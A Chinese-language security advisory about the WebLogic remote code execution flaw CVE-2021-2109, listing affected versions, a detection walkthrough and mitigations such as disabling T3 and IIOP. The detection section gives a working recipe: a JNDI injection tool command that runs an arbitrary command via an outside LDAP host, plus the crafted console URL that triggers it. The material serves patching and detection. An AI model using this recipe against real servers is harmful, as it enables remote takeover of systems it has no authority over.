当前位置:首页 >> 业界动态
Weblogic远程代码执行漏洞
CVE-2021-2109漏洞安全通告
1. 漏洞类型:
TAG: Weblogic、远程代码执行
危害等级:
应急等级: 黄色

2. 漏洞影响:
  2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。

3. 受影响版本:
  • 10.3.6.0.0
  • 12.1.3.0.0
  • 12.2.1.3.0
  • 12.2.1.4.0
  • 14.1.1.0.0

4. 漏洞检测:
环境:JDK1.7_80
Weblogic 12.1.3.0.0
工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
使用方法: java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 执行的命令 -A IP地址

参数说明:
IP地址:准备好的提供检测服务的服务器IP。
执行的命令:用户需要输入的命令,用来对被检测服务器执行命令,通过命令执行验证是否存在CVE-2021-2109漏洞。

检测URL: http://IP:PORT/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true& JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://POC_URL;AdminServer%22)

参数说明:
IP:被检测服务器IP。
PORT:被检测服务器的端口。
POC_URL:使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具生成的URL链接。

检测过程:使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具生成CVE-2021-2109漏洞的检测程序对应的URL链接。

本次实验环境:
提供的检测服务器IP为 192.168.204.137
被检测服务器IP为 192.168.204.143
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc -A 192.168.204.137

该语句生成“运行计算机程序”的命令执行攻击语句。
使用检测URL进行验证192.168.204.143服务器是否存在CVE-2021-2109漏洞:
http://192.168.204.143:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true& JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.204;137:1389/gk8iyh;AdminServer%22)
如图,192.168.204.143服务器成功运行计算机程序,证明该服务器的weblogic中间件存在CVE-2021-2109漏洞,如果计算机程序未执行,则证明服务器的weblogic中间件不存在CVE-2021-2109漏洞。

5. 解决措施:
1) 禁用T3协议
进入Weblogic控制台,在base_domain配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器
在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s
2) 禁止启用IIOP
登陆Weblogic控制台,找到启用IIOP选项,取消勾选,重启生效
3) 临时关闭后台/console/console.portal对外访问
4) 升级官方安全补丁

6. 相关链接:
1) https://xz.aliyun.com/t/9049